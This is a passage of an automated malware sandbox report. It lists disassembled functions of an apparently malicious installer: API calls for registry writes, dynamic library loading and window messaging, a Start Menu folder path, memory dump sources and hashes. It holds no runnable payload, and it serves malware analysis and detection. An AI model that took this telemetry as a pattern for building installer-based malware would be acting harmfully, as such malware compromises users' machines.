                                                                                          • Part of subcall function 6FE91A98: GlobalFree.KERNEL32(?), ref: 6FE91D13
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE91786
                                                                                        • FreeLibrary.KERNEL32(?), ref: 6FE91809
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE9182E
                                                                                          • Part of subcall function 6FE922AF: GlobalAlloc.KERNEL32(?,?), ref: 6FE922E0
                                                                                          • Part of subcall function 6FE926B2: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,6FE91757,00000000), ref: 6FE92782
                                                                                          • Part of subcall function 6FE9156B: wsprintfA.USER32 ref: 6FE91599
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3962662361-3916222277
                                                                                        • Opcode ID: 3bf192cc297539894bf91da7f54f33065b868d68d9919d8c210ce840fc45b3c7
                                                                                        • Instruction ID: 9d62924d229293546cd0e1da57b51bf57e3fa492d0b948ef069826d9387bc921
                                                                                        • Opcode Fuzzy Hash: 3bf192cc297539894bf91da7f54f33065b868d68d9919d8c210ce840fc45b3c7
                                                                                        • Instruction Fuzzy Hash: 8F41A0711013059BDF009FB499C4BDA3FADBF06368F24846AE9159A2C6DB79A045CBB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 783 401c0a-401c2a call 402b0a * 2 788 401c36-401c3a 783->788 789 401c2c-401c33 call 402b2c 783->789 791 401c46-401c4c 788->791 792 401c3c-401c43 call 402b2c 788->792 789->788 795 401c9a-401cc0 call 402b2c * 2 FindWindowExA 791->795 796 401c4e-401c6a call 402b0a * 2 791->796 792->791 808 401cc6 795->808 806 401c8a-401c98 SendMessageA 796->806 807 401c6c-401c88 SendMessageTimeoutA 796->807 806->808 809 401cc9-401ccc 807->809 808->809 810 401cd2 809->810 811 4029b8-4029c7 809->811 810->811
                                                                                        APIs
                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
                                                                                        • Instruction ID: 5540d85999f992b2d0d9c3d63f09df6deeece4c427f082cd61f041684b2cd5b6
                                                                                        • Opcode Fuzzy Hash: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
                                                                                        • Instruction Fuzzy Hash: 6E216BB1D48208BEEF06AFB4D98AAAD7FB5EB44304F10447EF501B61D1C7B89640DB18
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040243D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000023,00000011,00000002), ref: 00402488
                                                                                        • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,00000011,00000002), ref: 004024C5
                                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,00000011,00000002), ref: 004025A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseValuelstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp
                                                                                        • API String ID: 2655323295-3296606243
                                                                                        • Opcode ID: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
                                                                                        • Instruction ID: 8e9ea0cf859de5a6fe7672b5a81e2234dbec8cc7450cb22075f11fbb1059ccd6
                                                                                        • Opcode Fuzzy Hash: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
                                                                                        • Instruction Fuzzy Hash: 42119072E00218BEEB01AFA58E49EAE7BB8FB48314F20443BF504B71C1C6B85D419B58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040206A Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNELBASE(00000000,?,?), ref: 00402095
                                                                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                                                          • Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                                                          • Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll), ref: 0040516F
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD
                                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,?,?,?), ref: 004020A5
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,?,?), ref: 0040211F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2987980305-0
                                                                                        • Opcode ID: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
                                                                                        • Instruction ID: 97d835e61fc7e0b97890b4be7664cc53dce4a02014942e479506a03d8351e840
                                                                                        • Opcode Fuzzy Hash: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
                                                                                        • Instruction Fuzzy Hash: 4521D871A00214BBCF117FA4CE8DAAE79B4AB44319F20413BFA01B62D0C6FD9981D65E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
                                                                                          • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32
                                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,?,00000000,?), ref: 0040160D
                                                                                          • Part of subcall function 004055C7: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,?), ref: 0040163C
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 00401631
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers
                                                                                        • API String ID: 1892508949-720141496
                                                                                        • Opcode ID: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
                                                                                        • Instruction ID: 3a09c20382928311ba1d31a626229d1df209b5e1cddac7105c79dbf72218ebe6
                                                                                        • Opcode Fuzzy Hash: 54bd2716cff20c5ce2502cd1f1846264e2b1d456c8e0a835d425a5356db0bc86
                                                                                        • Instruction Fuzzy Hash: B4112731508141EBCB212FB94D4197F36B0EA96325F28453FE4D2B23E2D63D49429A3F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405EC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406105,80000002), ref: 00405F07
                                                                                        • RegCloseKey.KERNELBASE(?,?,00406105,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll), ref: 00405F12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue
                                                                                        • String ID: Call
                                                                                        • API String ID: 3356406503-1824292864
                                                                                        • Opcode ID: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
                                                                                        • Instruction ID: 897067c620da28adabf34c96f4b8630bfa599ba4fb7ce992f063a5310404d611
                                                                                        • Opcode Fuzzy Hash: abfb1157869b45efbda80eaac2ce6d2ce1cd77193e8e6ff114ced4d7fd94e931
                                                                                        • Instruction Fuzzy Hash: 6D015A7251020AABEF22CF61CC09FDB3BACEF55364F004026FA55A2190D278DA54CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406A9B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
                                                                                        • Instruction ID: 81ce818a04e0c3cc04ce684d9a2a9ddfd009c22adec174195ca66df60ea86fc9
                                                                                        • Opcode Fuzzy Hash: 03e86151e03bba78afe16222fe9d5ebe1cb7bbef763218a955a86232309b7881
                                                                                        • Instruction Fuzzy Hash: 69A14271E00229DBDF28CFA8C8446ADBBB1FF44305F15842AD916BB281C7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406C9C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
                                                                                        • Instruction ID: 08e1f0bd3e012b2653e952fb076f5459688999f8fa16d8000732ef154d800f7e
                                                                                        • Opcode Fuzzy Hash: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
                                                                                        • Instruction Fuzzy Hash: 53912370E00229CBEF28CF98C8547ADBBB1FF44305F15816AD956BB281C7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004069B2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
                                                                                        • Instruction ID: f9b0e14a80994b8e3cce9b061f2e265d206a391058c15f1564a8a9ac8da356b6
                                                                                        • Opcode Fuzzy Hash: 1a29bcf112b88c1b93ae01eb1cff818f8e5d0edf1da40eda35da1d05f3be857d
                                                                                        • Instruction Fuzzy Hash: 80814571D04229DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB281C7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004064B7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
                                                                                        • Instruction ID: 64fae73fcf261b5a29c0697abf595a3f572636c651b32177eb72ec05398ad39b
                                                                                        • Opcode Fuzzy Hash: ec6a1127f337a9cd102a75f31ecac58d5a9bcb7082b0f725788ddd98255f1a75
                                                                                        • Instruction Fuzzy Hash: 39817831D04229DBEF24CFA8D8447ADBBB0FB44305F21816AD856BB2C1C7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406905 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
                                                                                        • Instruction ID: 51e77fe0f08f8d7ba03d7e1561fc41eb13955110d3fdee4e61b85cd17e52ee3e
                                                                                        • Opcode Fuzzy Hash: e7ab0f5182b65f417a428d3e5ace57518a098f994e057f816ecf8909cd511bbd
                                                                                        • Instruction Fuzzy Hash: C4712371D04229DBEF28CF98C8447ADBBB1FB44305F15806AD806BB281D7789A96DF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406A23 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
